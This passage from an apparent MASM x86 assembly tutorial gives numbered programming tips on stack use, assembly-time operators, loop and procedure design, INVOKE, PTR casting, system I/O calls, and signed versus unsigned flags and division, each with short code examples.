The runtime stack is a memory array directly managed by the CPU, with the stack pointer register ESP holding a 32-bit offset into the stack. ESP is modified by instructions such as CALL, RET, PUSH, and POP. When you use PUSH and POP or the like, you explicitly change the stack contents. You should be very cautious not to affect its implicit uses, like CALL and RET, because you, the programmer, and the system share the same runtime stack.

8. Assignment with PUSH and POP is not efficient

In assembly code, you definitely can make use of the stack to do the assignment previous = current, as in FibonacciByMemory. The following is FibonacciByStack, where the only difference is using PUSH and POP instead of the two MOV instructions with EDX.

;------------------------------------------------------------
FibonacciByStack PROC
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   mov   eax,1         
   mov   previous,0         
   mov   current,0         
L1:
   add  eax,previous      ; eax = current + previous     
   push current           ; previous = current
   pop  previous
   mov  current, eax
loop   L1
   ret
FibonacciByStack ENDP

As you can imagine, the runtime stack, built on memory, is much slower than registers. If you create a test benchmark to compare the above procedures in a long loop, you'll find that FibonacciByStack is the most inefficient. My suggestion is that if you can use a register or memory, don't use PUSH and POP.

9. Using INC to avoid PUSHFD and POPFD

When you use the instruction ADC or SBB to add or subtract an integer together with the previous carry, you reasonably want to preserve the carry flag (CF) with PUSHFD and POPFD, since an address update with ADD would overwrite CF. The following Extended_Add example, borrowed from the textbook [2], calculates the sum of two extended long integers BYTE by BYTE:

;--------------------------------------------------------
Extended_Add PROC
; Receives: ESI and EDI point to the two long integers
;           EBX points to an address that will hold sum
;           ECX indicates the number of BYTEs to be added
; Returns:  EBX points to an address of the result sum
;--------------------------------------------------------
   clc                      ; clear the Carry flag
   L1:
      mov   al,[esi]        ; get the first integer
      adc   al,[edi]        ; add the second integer
      pushfd                ; save the Carry flag

      mov   [ebx],al        ; store partial sum
      add   esi, 1          ; point to next byte   
      add   edi, 1
      add   ebx, 1          ; point to next sum byte   
      popfd                 ; restore the Carry flag
   loop   L1                ; repeat the loop

   mov   dword ptr [ebx],0  ; clear high dword of sum
   adc   dword ptr [ebx],0  ; add any leftover carry
   ret
Extended_Add ENDP

As we know, the INC instruction increments by 1 without affecting CF. Obviously we can replace the ADD instructions above with INC to avoid PUSHFD and POPFD. Thus the loop is simplified like this:

L1:
   mov   al,[esi]        ; get the first integer
   adc   al,[edi]        ; add the second integer

   mov   [ebx],al        ; store partial sum
   inc   esi             ; add one without affecting CF
   inc   edi
   inc   ebx
loop   L1                ; repeat the loop

Now you might ask: what about calculating the sum of two long integers DWORD by DWORD, where each iteration must advance the addresses by 4 bytes, i.e. TYPE DWORD? We can still make use of INC with an implementation like this:

clc
xor   ebx, ebx

L1:
    mov eax, [esi +ebx*TYPE DWORD]
    adc eax, [edi +ebx*TYPE DWORD]
    mov [edx +ebx*TYPE DWORD], eax
    inc ebx
loop  L1

Applying a scaling factor here would be more general and preferred. Similarly, wherever necessary, you also can use the DEC instruction that makes a decrement by 1 without affecting the carry flag.

10. Another good reason to avoid PUSH and POP

Since you and the system share the same stack, you should be very careful not to disturb the system's use of it. If you forget to pair PUSH and POP, an error can happen, especially when a conditional jump skips one of them before the procedure returns.

The following Search2DAry searches a 2-dimensional array for a value passed in EAX. If it is found, simply jump to the FOUND label returning one in EAX as true, else set EAX zero as false.

;------------------------------------------------------------
Search2DAry PROC
; Receives: EAX, a byte value to search a 2-dimensional array
;           ESI, an address to the 2-dimensional array
; Returns: EAX, 1 if found, 0 if not found
;------------------------------------------------------------
   mov  ecx,NUM_ROW        ; outer loop count

ROW:   
   push ecx                ; save outer loop counter
   mov  ecx,NUM_COL        ; inner loop counter

   COL:   
      cmp al, [esi+ecx-1]
      je FOUND   
   loop COL

   add esi, NUM_COL
   pop  ecx                ; restore outer loop counter
loop ROW                   ; repeat outer loop

   mov eax, 0
   jmp QUIT
FOUND: 
   mov eax, 1
QUIT:
   ret
Search2DAry ENDP

Let’s call it in main by preparing the argument ESI pointing to the array address and the search value EAX to be 31h or 30h respectively for not-found or found test case:

.data
ary2D   BYTE  10h,  20h,  30h,  40h,  50h
        BYTE  60h,  70h,  80h,  90h,  0A0h
NUM_COL = 5
NUM_ROW = 2

.code
main PROC
   mov esi, OFFSET ary2D
   mov eax, 31h            ; crash if set 30h 
   call Search2DAry
; See eax for search result
   exit
main ENDP

Unfortunately, it only works for the not-found case, 31h. A crash occurs for a successful search like 30h, because of the outer loop counter left pushed on the stack. Sadly enough, that leftover is popped by RET and becomes the return address to the caller.

Therefore, it's better to use a register or a variable to save the outer loop counter here. Although a logic error would remain, a crash would not happen, since the system's use of the stack is not disturbed. As a good exercise, you can try to fix it.
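
One way to do it, sketched below as my own variant rather than the article's answer, keeps the outer counter in EDX so nothing is left on the stack when the inner loop jumps out:

   mov  edx, NUM_ROW        ; outer loop counter kept in a register
ROW:
   mov  ecx, NUM_COL        ; inner loop counter
COL:
   cmp  al, [esi+ecx-1]
   je   FOUND
   loop COL

   add  esi, NUM_COL        ; move to the next row
   dec  edx                 ; next outer iteration without touching the stack
   jnz  ROW

   mov  eax, 0
   jmp  QUIT
FOUND:
   mov  eax, 1
QUIT:
   ret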

Assembling time vs. runtime

I would like to talk more about this assembly language feature: if you can do something at assembly time, don't do it at runtime. Organizing logic at assembly time means doing the job statically (at translation time), without consuming runtime. Unlike in high-level languages, all operators in assembly language are processed at assembly time, such as +, -, *, and /, while only instructions work at runtime, like ADD, SUB, MUL, and DIV.

11. Implementing with plus (+) instead of ADD

Let's redo the Fibonacci calculation and implement eax = ebx + edx with the plus operator, with the help of the LEA instruction. The following is FibonacciByRegLEA, with only one line changed from FibonacciByRegMOV.

;------------------------------------------------------------
FibonacciByRegLEA PROC
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   xor   eax,eax         
   xor   ebx,ebx      
   mov   edx,1      
L1:
   lea  eax, DWORD PTR [ebx+edx]  ; eax = ebx + edx
   mov  edx,ebx
   mov  ebx,eax
loop   L1

   ret
FibonacciByRegLEA ENDP

This statement is encoded in three bytes of machine code, without an explicit addition operation at runtime:

000000CE  8D 04 1A      lea eax, DWORD PTR [ebx+edx]  ; eax = ebx + edx

This example doesn't make much of a performance difference compared to FibonacciByRegMOV, but it is enough as an implementation demo.

12. If you can use an operator, don’t use an instruction

For an array defined as:

.data
   Ary1 DWORD 20 DUP(?)

If you want to traverse it from the second element to the middle one, you might think of doing this, as in other languages:

mov esi, OFFSET Ary1
add esi, TYPE DWORD     ; start at the second value
mov ecx, LENGTHOF Ary1  ; total number of values
sub ecx, 1
shr ecx, 1              ; halve the loop counter at runtime
L1:
   ; do traversing
Loop L1

Remember that ADD, SUB, and SHR are dynamic behavior at runtime. If you know the values in advance, there is no need to calculate them at runtime; instead, apply operators at assembly time:

mov esi, OFFSET Ary1 + TYPE DWORD   ; start at the second
mov ecx, (LENGTHOF Ary1 - 1)/2      ; set loop counter
L1:
   ; do traversing
Loop L1

This saves three instructions in the code segment at runtime. Next, let’s save memory in the data segment.

13. If you can use a symbolic constant, don’t use a variable

Like operators, all directives are processed at assembly time. A variable consumes memory and has to be accessed at runtime. As for the last Ary1, you may want to remember its size in bytes and its number of elements like this:

.data
   Ary1 DWORD 20 DUP(?)
   arySizeInByte DWORD ($ - Ary1)  ; 80
   aryLength DWORD LENGTHOF Ary1   ; 20

It is correct but not preferred, because it uses two variables. Why not simply make them symbolic constants to save the memory of two DWORDs?

.data
   Ary1 DWORD 20 DUP(?)
   arySizeInByte = ($ - Ary1)      ; 80
   aryLength EQU LENGTHOF Ary1     ; 20

Using either equal sign or EQU directive is fine. The constant is just a replacement during code preprocessing.

14. Generating the memory block in macro

For an amount of data to initialize, if you already know the logic of how to create it, you can use macro directives to generate the memory block at assembly time instead of at runtime. The following creates all 47 Fibonacci numbers that fit in 32 bits, in a DWORD array named FibArray:

.data
val1 = 1
val2 = 1
val3 = val1 + val2 

FibArray LABEL DWORD
DWORD val1                ; first two values
DWORD val2
WHILE val3 LT 0FFFFFFFFh  ; less than 4-billion, 32-bit
   DWORD val3             ; generate unnamed memory data
   val1 = val2
   val2 = val3
   val3 = val1 + val2
ENDM

As the macro expansion is processed statically by the assembler, this saves considerable initialization at runtime, as opposed to the FibonacciByXXX procedures mentioned before.

For more about macros in MASM, see my article Something You May Not Know About the Macro in MASM [4]. I also reverse engineered the VC++ compiler's implementation of the switch statement. Interestingly, under some conditions the switch statement chooses a binary search, but without exposing any sort implementation at runtime. It's reasonable to assume that the preprocessor does the sorting with all the known case values at compilation time. The static sorting behavior (as opposed to dynamic behavior at runtime) could be implemented with a macro procedure, directives, and operators. For details, please see Something You May Not Know About the Switch Statement in C/C++ [5].

About loop design

Almost every language provides an unconditional jump like GOTO, but most of us rarely use it, based on software engineering principles; instead, we use constructs like break and continue. In assembly language, however, we rely more on jumps, conditional or unconditional, to control the workflow freely. In the following sections, I list some ill-coded patterns.

15. Encapsulating all loop logic in the loop body

To construct a loop, try to keep all your loop contents in the loop body. Don't jump out to do something and then jump back into the loop. The example here traverses a one-dimensional integer array; if an odd number is found, increment it, else do nothing.

Two unclear solutions with the correct result might look like the two versions below:

; Version 1: incrementing after the loop
   mov ecx, LENGTHOF array
   xor esi, esi
L1: 
   test array[esi], 1
   jnz ODD
PASS:
   add esi, TYPE DWORD
loop L1
   jmp DONE

ODD: 
  inc array[esi]
jmp PASS
DONE:

; Version 2: incrementing before the loop
   mov ecx, LENGTHOF array
   xor esi, esi
   jmp L1

ODD: 
  inc array[esi]
jmp PASS

L1: 
   test array[esi], 1
   jnz ODD
PASS:
   add esi, TYPE DWORD
loop L1

However, both do the incrementing outside the loop and then jump back in. Both make the check inside the loop, but the first version does the incrementing after the loop and the second before it. For simple logic you may not write code like this, but for a complicated problem, assembly language can lead you astray into such a spaghetti pattern. The following is a good version, which encapsulates all the logic in the loop body: concise, readable, maintainable, and efficient.

   mov ecx, LENGTHOF array
   xor esi, esi
L1: 
   test array[esi], 1
   jz PASS
   inc array[esi]
PASS:
   add esi, TYPE DWORD
loop L1

16. Loop entrance and exit

Usually preferred is a loop with one entrance and one exit. But if necessary, two or more conditional exits are fine as shown in Search2DAry with found and not-found results.

The following is a bad two-entrance pattern, where one path gets into START via the initialization and another goes directly to MIDDLE. Such code is pretty hard to understand; the loop logic needs to be reorganized or refactored.

   ; do something
   je MIDDLE

   ; loop initialization
START: 
   ; do something

MIDDLE:
   ; do something
loop START

The following is a bad pattern with two loop ends, where some logic exits the loop at the first end while the rest exits at the second. Such code is quite confusing. Try to reorganize it with a label jump so as to maintain a single loop end.

   ; loop initialization
START2: 
   ; do something
   je NEXT
   ; do something
loop START2
   jmp DONE

NEXT:
   ; do something
loop START2
DONE:

17. Don’t change ECX in the loop body

The register ECX acts as the loop counter and its value is implicitly decremented when the LOOP instruction is used. You can read ECX and make use of its value in an iteration; as seen in Search2DAry in the previous section, we compare the indirect operand [ESI+ECX-1] with AL. But never try to change the loop counter within the loop body; that makes the code hard to understand and hard to debug. A good practice is to treat the loop counter ECX as read-only.

   ; do initialization
   mov ecx, 10
L1: 
   ; do something
   mov eax, ecx                      ; fine
   mov ebx, [esi +ecx *TYPE DWORD]   ; fine
   mov ecx, edx                      ; not good 
   inc ecx                           ; not good
   ; do something
loop L1

18. When jumping backward…

Besides the LOOP instruction, assembly language programming can rely heavily on conditional or unconditional jumps to create a loop when the count is not determined before the loop. Theoretically, any backward jump can be considered a loop. Assume that jx and jy are the desired jump or LOOP instructions. The following backward jy L2, nested in the jx L1 loop, is probably thought of as an inner loop.

; loop initialization 
L1: 
   ; do something
 L2: 
   ; do something
 jy L2
   ; do something
jx L1

To get if-then-else selection logic, it's reasonable to use a forward jump like this for branching within the jx L1 iteration:

; loop initialization 
L1: 
   ; do something
 jy TrueLogic
   ; do something for false
   jmp DONE
 TrueLogic:
   ; do something for true
DONE:
   ; do something
jx L1

About procedure

Procedures in assembly language are similar to functions in C/C++; let's talk about some of their basics.

19. Making a clear calling interface

When designing a procedure, we hope to make it as reusable as possible. Make it perform only one task, without extras like I/O. The procedure's caller should take responsibility for input and output. The caller should communicate with the procedure only through arguments and parameters. The procedure should use only its parameters in its logic, without referring to outside definitions, without any:

  • Global variable and array
  • Global symbolic constant

Implementing with such definitions makes your procedure non-reusable.

Recalling the previous five FibonacciByXXX procedures, we use the register ECX as both argument and parameter, with the return value in EAX, to make a clear calling interface:

;------------------------------------------------------------
FibonacciByXXX 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------

Now the caller can do something like:

; Read user’s input n and save in ECX
call FibonacciByXXX
; Output or process the nth Fibonacci number in EAX

To illustrate as a second example, let’s take a look again at calling Search2DAry in the previous section. The register arguments ESI and EAX are prepared so that the implementation of Search2DAry doesn’t directly refer to the global array, ary2D.

... ...
NUM_COL = 5
NUM_ROW = 2

.code
main PROC
   mov esi, OFFSET ary2D
   mov eax, 31h 
   call Search2DAry
; See eax for search result
   exit
main ENDP

;------------------------------------------------------------
Search2DAry PROC
; Receives: EAX, a byte value to search a 2-dimensional array
;           ESI, an address to the 2-dimensional array
; Returns: EAX, 1 if found, 0 if not found
;------------------------------------------------------------
   mov  ecx,NUM_ROW        ; outer loop count
... ...
   mov  ecx,NUM_COL        ; inner loop counter
... ...

Unfortunately, the weakness is that its implementation still uses the two global constants NUM_ROW and NUM_COL, which prevents it from being called elsewhere. To improve it, supplying two more register arguments would be an obvious way; or see the next section.

20. INVOKE vs. CALL

Besides the CALL instruction from Intel, MASM provides the 32-bit INVOKE directive to make a procedure call easier. With the CALL instruction, you can only use registers as the argument/parameter pairs in the calling interface, as shown above. The problem is that the number of registers is limited. All registers are global, and you probably have to save registers before a call and restore them afterwards. The INVOKE directive gives a procedure the form of a parameter list, as you have experienced in high-level languages.

When we reconsider Search2DAry with a parameter list, so that it no longer refers to the global constants NUM_ROW and NUM_COL, we can give it a prototype like this:

;---------------------------------------------------------------------
Search2DAry PROTO, pAry2D: PTR BYTE, val: BYTE, nRow: WORD, nCol: WORD 
; Receives: pAry2D, an address to the 2-dimensional array
;           val, a byte value to search a 2-dimensional array 
;           nRow, the number of rows 
;           nCol, the number of columns
; Returns: EAX, 1 if found, 0 if not found
;---------------------------------------------------------------------

Again, as an exercise, you can try to implement this as the fix. Now you just do:

INVOKE Search2DAry, ADDR ary2D, 31h, NUM_ROW, NUM_COL
; See eax for search result

Likewise, to construct a parameter-list procedure, you still need to follow the rule of not referring to global variables and constants. Besides, pay attention to this:

  • The entire calling interface should go only through the parameter list, without referring to any register values set outside the procedure.

21. Call-by-Value vs. Call-by-Reference

Also be aware that a parameter list should not be too long; if it would be, use an object parameter instead. Suppose that you fully understand the function concept and call-by-value vs. call-by-reference in high-level languages. By learning about the stack frame in assembly language, you understand more about the low-level function calling mechanism. Usually, for an object argument, we prefer passing a reference, the object's address, rather than having the whole object copied onto the stack.

To demonstrate this, let’s create a procedure to write month, day, and year from an object of the Win32 SYSTEMTIME structure.

The following is the version of call-by-value, where we use the dot operator to retrieve individual WORD field members from the DateTime object and extend their 16-bit values to 32-bit EAX:

;--------------------------------------------------------
WriteDateByVal PROC, DateTime:SYSTEMTIME
; Receives: DateTime, an object of SYSTEMTIME
;--------------------------------------------------------
   movzx eax, DateTime.wMonth
   ; output eax as month
   ; output a separator like '/' 
   movzx eax, DateTime.wDay
   ; output eax as day
   ; output a separator like '/' 
   movzx eax, DateTime.wYear
   ; output eax as year
   ; make a newline
   ret
WriteDateByVal ENDP

The call-by-reference version is not so straightforward, since an object address is received. Lacking the arrow pointer operator -> of C/C++, we have to save the pointer (address) value in a 32-bit register like ESI. To use ESI as an indirect operand, we must cast its memory back to the SYSTEMTIME type. Then we can get the object members with the dot:

;--------------------------------------------------------
WriteDateByRef PROC, datetimePtr: PTR SYSTEMTIME
; Receives: datetimePtr, the address of a SYSTEMTIME object
;--------------------------------------------------------
   mov esi, datetimePtr
   movzx eax, (SYSTEMTIME PTR [esi]).wMonth
   ; output eax as month
   ; output a separator like '/'
   movzx eax, (SYSTEMTIME PTR [esi]).wDay
   ; output eax as day
   ; output a separator like '/' 
   movzx eax, (SYSTEMTIME PTR [esi]).wYear
   ; output eax as year
   ; make a newline
   ret
WriteDateByRef ENDP

You can watch the stack frame of the argument passed in the two versions at runtime. For WriteDateByVal, eight WORD members are copied onto the stack, consuming sixteen bytes, while WriteDateByRef needs only four bytes for a 32-bit address. That makes a big difference for a large structure object.

22. Avoid multiple RET

To construct a procedure, it's ideal to keep all your logic within the procedure body. Preferred is a procedure with one entrance and one exit. In assembly language programming, a procedure name, like any label, is directly represented by a memory address, so directly jumping to a label or a procedure without using CALL or INVOKE is possible. Since such an abnormal entry is quite rare, I am not going to cover it here.

Although multiple returns are sometimes used in examples in other languages, I don't encourage such a pattern in assembly code. Multiple RET instructions can make your logic hard to understand and debug. The first procedure below, MultiRetEx, is such an example of branching. Instead, in the second, SingleRetEx, we have a label QUIT at the end and jump there to make a single exit, where common finishing work can be done to avoid repeated code.

MultiRetEx PROC
   ; do something 
   jx NEXTx
   ; do something
   ret

NEXTx: 
   ; do something
   jy NEXTy
   ; do something
   ret

NEXTy: 
   ; do something
   ret
MultiRetEx ENDP
SingleRetEx PROC
   ; do something 
   jx NEXTx
   ; do something
   jmp QUIT
NEXTx: 
   ; do something
   jy NEXTy
   ; do something
   jmp QUIT
NEXTy: 
   ; do something
QUIT:
   ; do common things
   ret
SingleRetEx ENDP

Object data members

Similar to the SYSTEMTIME structure above, we can also create our own type, or a nested one:

Rectangle STRUCT
   UpperLeft COORD <>
   LowerRight COORD <>
Rectangle ENDS

.data
rect Rectangle { {10,20}, {30,50} }

The Rectangle type contains two COORD members, UpperLeft and LowerRight. The Win32 COORD contains two WORD (SHORT), X and Y. Obviously, we can access the object rect’s data members with the dot operator from either direct or indirect operand like this

; directly access
mov rect.UpperLeft.X, 11

; cast indirect operand to access
mov esi,OFFSET rect
mov (Rectangle PTR [esi]).UpperLeft.Y, 22

; use the OFFSET operator for embedded members
mov esi,OFFSET rect.LowerRight
mov (COORD PTR [esi]).X, 33
mov esi,OFFSET rect.LowerRight.Y
mov WORD PTR [esi], 55

By using the OFFSET operator, we access different data member values with different type casts. Recall that any operator is processed statically at assembly time. What if we want to retrieve a data member's address (not its value) at runtime?

23. Indirect operand and LEA

For an indirect operand pointing to an object, you can't use the OFFSET operator to get a member's address, because OFFSET can only take the address of a variable defined in the data segment.

There could be a scenario where we have to pass an object reference argument to a procedure, like WriteDateByRef in the previous section, but want to retrieve a member's address (not its value). Still using the rect object above as an example, the second use of OFFSET in the following is not valid and does not assemble:

mov esi,OFFSET rect
mov edi, OFFSET (Rectangle PTR [esi]).LowerRight

Let's ask for help from the LEA instruction that you saw in FibonacciByRegLEA in a previous section. The LEA instruction calculates and loads the effective address of a memory operand. It is similar to the OFFSET operator, except that only LEA can obtain an address calculated at runtime:

mov esi,OFFSET rect
lea edi, (Rectangle PTR [esi]).LowerRight
mov ebx, OFFSET rect.LowerRight

lea edi, (Rectangle PTR [esi]).UpperLeft.Y
mov ebx, OFFSET rect.UpperLeft.Y

mov esi,OFFSET rect.UpperLeft
lea edi, (COORD PTR [esi]).Y

I purposely use EBX here to get each address statically, so you can verify that the same address shows up in EDI, loaded dynamically from the indirect operand ESI at runtime.

About system I/O

From Computer Memory Basics, we know that I/O operations through the operating system are quite slow. Input and output are usually measured in milliseconds, compared with register and memory operations in nanoseconds or microseconds. To be more efficient, trying to reduce system API calls is a good idea; here I mean Win32 API calls. For details about the Win32 functions mentioned below, please refer to MSDN.

24. Reducing system I/O API calls

An example is to output 20 lines of 50 random characters with random colors as below:

We certainly can generate and output one character at a time by using SetConsoleTextAttribute and WriteConsole. Simply set its color by:

INVOKE SetConsoleTextAttribute, consoleOutHandle, wAttributes

Then write that character by

INVOKE WriteConsole,
   consoleOutHandle,    ; console output handle
   OFFSET buffer,       ; points to string
   1,                   ; string length
   OFFSET bytesWritten, ; returns number of bytes written
   0

After writing 50 characters, make a new line. So we can create a nested iteration: the outer loop for 20 rows and the inner loop for 50 columns. At 50 by 20, we call each of these two console output functions 1,000 times.

However, another pair of API functions can be more efficient, writing a whole row of 50 characters and setting their colors at once. They are WriteConsoleOutputAttribute and WriteConsoleOutputCharacter. To make use of them, let's create two procedures:

;-----------------------------------------------------------------------
ChooseColor PROC
; Selects a color with 50% probability of red, 25% green and 25% yellow
; Receives: nothing
; Returns:  AX = randomly selected color

;-----------------------------------------------------------------------
ChooseCharacter PROC
; Randomly selects an ASCII character, from ASCII code 20h to 07Ah
; Receives: nothing
; Returns:  AL = randomly selected character

We call them in a loop to prepare a WORD array bufColor and a BYTE array bufChar for all 50 characters selected. Now we can write the 50 random characters per line with two calls here:

INVOKE WriteConsoleOutputAttribute, 
      outHandle, 
      ADDR bufColor, 
      MAXCOL, 
      xyPos, 
      ADDR cellsWritten

INVOKE WriteConsoleOutputCharacter, 
      outHandle, 
      ADDR bufChar, 
      MAXCOL, 
      xyPos, 
      ADDR cellsWritten

Besides bufColor and bufChar, we define MAXCOL = 50 and a COORD variable xyPos, whose xyPos.y is incremented for each row in a single loop of 20 rows. In total, we call each of these two APIs only 20 times.

About PTR operator

MASM provides the operator PTR, which is similar to the pointer * used in C/C++. The following is the PTR specification:

  • type PTR expression
    Forces the expression to be treated as having the specified type.
  • [[ distance ]] PTR type
    Specifies a pointer to type.

This means that two usages are available, such as BYTE PTR or PTR BYTE. Let’s discuss how to use them.

25. Defining a pointer, cast and dereference

The following C/C++ code demonstrates which endianness is used in your system, little endian or big endian. As the integer type takes four bytes, it casts the array name fourBytes, a char address, to an unsigned int address. Then it displays the integer result by dereferencing the unsigned int pointer.

#include <stdio.h>

int main()
{
   unsigned char fourBytes[] = { 0x12, 0x34, 0x56, 0x78 };
   // Cast the memory pointed by the array name fourBytes, to unsigned int address
   unsigned int *ptr = (unsigned int *)fourBytes;
   printf("1. Directly Cast: n is %Xh\n", *ptr);
   return 0;
}

As expected on an Intel x86-based system, this verifies little-endian order by showing 78563412 in hexadecimal. We can do the same thing in assembly language with DWORD PTR, which is similar to casting an address to a 4-byte DWORD, the unsigned int type.

.data
fourBytes BYTE 12h,34h,56h,78h

.code
mov eax, DWORD PTR fourBytes		; EAX = 78563412h

There is no explicit dereference here, since DWORD PTR combines the four bytes into a DWORD memory operand and lets MOV retrieve it as a direct operand into EAX. This could be considered equivalent to the (unsigned int *) cast.

Now let's do it another way, using PTR DWORD. Again with the same logic as above, this time we first define a DWORD pointer type with TYPEDEF:

DWORD_POINTER TYPEDEF PTR DWORD

This could be considered equivalent to defining the pointer type unsigned int *. Then, in the following data segment, the address variable dwPtr takes over the fourBytes memory. Finally, in the code, EBX holds this address as an indirect operand, and an explicit dereference gets the DWORD value into EAX.

.data
fourBytes BYTE 12h,34h,56h,78h
dwPtr DWORD_POINTER fourBytes

.code
mov ebx, dwPtr       ; Get DWORD address		
mov eax, [ebx]       ; Dereference, EAX = 78563412h

To summarize, PTR DWORD indicates a DWORD address type used to define (declare) a variable, like a pointer type, while DWORD PTR indicates the memory pointed to by a DWORD address, like a type cast.

26. Using PTR in a procedure

To define a procedure with a parameter list, you might want to use PTR in both ways. The following is such an example to increment each element in a DWORD array:

;---------------------------------------------------------
IncrementArray PROC, pAry:PTR DWORD, count:DWORD
; Receives: pAry  - pointer to a DWORD array
;           count - the array count
; Returns:  pAry, every value in pAry incremented
;---------------------------------------------------------
   mov edi,pAry
   mov ecx,count                      

 L1:
   inc DWORD PTR [edi]
   add edi, TYPE DWORD
 loop L1
   ret
IncrementArray ENDP

As the first parameter pAry is a DWORD address, PTR DWORD is used as its parameter type. In the procedure, when incrementing a value pointed to by the indirect operand EDI, you must tell the assembler what the type (size) of that memory is by using DWORD PTR.

Another example is the earlier mentioned WriteDateByRef, where SYSTEMTIME is a Windows defined structure type.

;--------------------------------------------------------
WriteDateByRef PROC, datetimePtr: PTR SYSTEMTIME
; Receives: datetimePtr, the address of a SYSTEMTIME object
;--------------------------------------------------------
   mov esi, datetimePtr
   movzx eax, (SYSTEMTIME PTR [esi]).wMonth
  ... ...
   ret
WriteDateByRef ENDP

Likewise, we use PTR SYSTEMTIME as the parameter type to define datetimePtr. When ESI receives an address from datetimePtr, it has no knowledge of the memory type, just like a void pointer in C/C++. We have to cast it as SYSTEMTIME memory in order to retrieve its data members.
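A minimal usage sketch, assuming the Windows include files in use declare SYSTEMTIME and a prototype for GetLocalTime:

.data
sysTime SYSTEMTIME <>

.code
INVOKE GetLocalTime, ADDR sysTime       ; Windows fills in the structure
INVOKE WriteDateByRef, ADDR sysTime     ; pass its address to the procedure above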

Signed and Unsigned

In assembly language programming, you can define an integer variable as either signed, with SBYTE, SWORD, and SDWORD, or unsigned, with BYTE, WORD, and DWORD. The 8-bit data ranges, for example, are

  • BYTE: 0 to 255 (00h to FFh), totally 256 numbers
  • SBYTE: half negatives, -128 to -1 (80h to FFh), half positives, 0 to 127 (00h to 7Fh)

From the hardware point of view, all CPU instructions operate exactly the same on signed and unsigned integers, because the CPU cannot distinguish between them. For example, when defining

.data
   bVal   BYTE   255
   sbVal  SBYTE  -1

Both of them have the same 8-bit value FFh saved in memory or moved to a register. You, as the programmer, are solely responsible for using the correct data type with an instruction, and you should be able to explain the result from the flags affected:

  • The carry flag CF for unsigned integers
  • The overflow flag OF for signed integers

The following sections cover several common tricks and pitfalls.

27. Comparison with conditional jumps

Let's check the following code to see which label it jumps to:

mov   eax, -1
cmp   eax, 1
ja    L1
jmp   L2

As we know, CMP follows the same logic as SUB but is non-destructive to the destination operand. Using JA means an unsigned comparison, where the destination EAX is FFFFFFFFh, the largest unsigned 32-bit value, while the source is 1. That value is certainly bigger than 1, so the jump to L1 is taken. Thus, the unsigned conditional jumps such as JA, JB, JAE, JNA, etc. can be remembered by A (Above) or B (Below). An unsigned comparison is determined by CF and the zero flag ZF, as shown in the following examples:

CMP result               Destination   Source   ZF(ZR)   CF(CY)
Destination < Source          1           2        0        1
Destination > Source          2           1        0        0
Destination = Source          1           1        1        0

Now let’s take a look at signed comparison with the following code to see where it jumps:

mov   eax, -1
cmp   eax, 1
jg    L1
jmp   L2

The only difference is JG here instead of JA. Using JG means a signed comparison, where the destination EAX is FFFFFFFFh, i.e. -1, while the source is 1. Certainly -1 is smaller than 1, so the code jumps to L2. Likewise, the signed conditional jumps such as JG, JL, JGE, JNG, etc. can be remembered by G (Greater) or L (Less). A signed comparison is determined by OF and the sign flag SF, as shown in the following examples:

CMP result (8-bit operands)         Destination   Source   SF(PL)   OF(OV)
Destination < Source (SF != OF)         -2          127       0        1
                                        -2            1       1        0
Destination > Source (SF == OF)        127            1       0        0
                                       127           -1       1        1
Destination = Source                     1            1     ZF = 1

28. When CBW, CWD, or CDQ mistakenly meets DIV…

As we know, the DIV instruction performs unsigned 8-bit, 16-bit, or 32-bit integer division with the dividend in AX, DX:AX, or EDX:EAX respectively. Since it is unsigned, you have to clear the upper half by zeroing AH, DX, or EDX before using DIV. When performing signed division with IDIV, however, the sign-extension instructions CBW, CWD, and CDQ are provided to extend the upper half before using IDIV.

For a positive integer (its highest bit, the sign bit, is zero), there is no difference between manually clearing the upper part of the dividend and mistakenly using a sign extension, as the following example shows:

mov eax,1002h
cdq
mov ebx,10h
div ebx  ; Quotient EAX = 00000100h, Remainder EDX = 2

This is fine because 1002h is a small positive value and CDQ makes EDX zero, the same as directly clearing EDX. So if your value is positive and its highest bit is zero, using CDQ and

XOR EDX, EDX

are exactly the same.

However, this does not mean that you can always use CDQ/CWD/CBW with DIV when performing a positive division. Take an 8-bit example, 129/2, expecting quotient 64 and remainder 1. But if you write this

mov  al, 129
cbw             ; Extend AL to AH as negative AX = FF81h
mov  bl,2
div  bl         ; Unsigned DIV: the quotient would be 7FC0h, too large for AL

Try the above in the debugger to see how the integer divide overflow happens. If you really want a correct unsigned DIV, you must:

mov  al, 129
XOR  ah, ah     ; extend AL to AH as positive
mov  bl,2
div  bl         ; Quotient AL = 40h,  Remainder AH = 1

On the other hand, if you really want to use CBW, it means you are performing a signed division. Then you must use IDIV:

mov  al, 129    ; 81h (-127d)
cbw             ; Extend AL to AH as negative AX = FF81h
mov  bl,2
idiv bl         ; Quotient AL = C1h (-63d), Remainder AH = FFh (-1)

As seen here, 81h as a signed byte is decimal -127, so the signed IDIV gives the correct quotient and remainder as shown above.

29. Why 255-1 and 255+(-1) affect CF differently?

To talk about the carry flag CF, let’s take the following two arithmetic calculations:

mov al, 255
sub al, 1      ; AL = FE  CF = 0

mov bl, 255
add bl, -1     ; BL = FE  CF = 1

From a human being's point of view, they do exactly the same operation: 255 minus 1 with the result 254 (FEh). Likewise, from the hardware point of view, the CPU does the same operation for either calculation, representing -1 as the two's complement FFh and then adding it to 255. Now 255 is FFh and the binary representation of -1 is also FFh. This is how it is calculated:

   1111 1111
+  1111 1111
-------------
   1111 1110

Remember? A CPU operates exactly the same on signed and unsigned because it cannot distinguish them. A programmer should be able to explain the behavior from the flags affected. Since we are talking about CF, we consider both calculations as unsigned. The key point is that FFh, the representation of -1, is 255 in decimal. So the logical interpretation of CF is

  • For sub al, 1, it means 255 minus 1 resulting in 254, with no borrow needed, so CF = 0
  • For add bl, -1, it means 255 plus 255 resulting in 510; with a carry of 1 0000 0000b (256) out of the byte, 254 is left in the byte, so CF = 1 (see the short sketch below)
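A minimal sketch to observe the difference with a conditional jump (the labels hadBorrow and hadCarry are hypothetical):

mov al, 255
sub al, 1      ; CF = 0, so this jump is not taken
jc  hadBorrow

mov bl, 255
add bl, -1     ; CF = 1, so this jump is taken
jc  hadCarry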

In the hardware implementation, CF depends on which instruction is used, ADD or SUB. Here MSB (Most Significant Bit) is the highest bit.

  • For the ADD instruction, add bl, -1, the carry out of the MSB is used directly, so CF = 1
  • For the SUB instruction, sub al, 1, the carry out of the MSB is INVERTED, so CF = 0

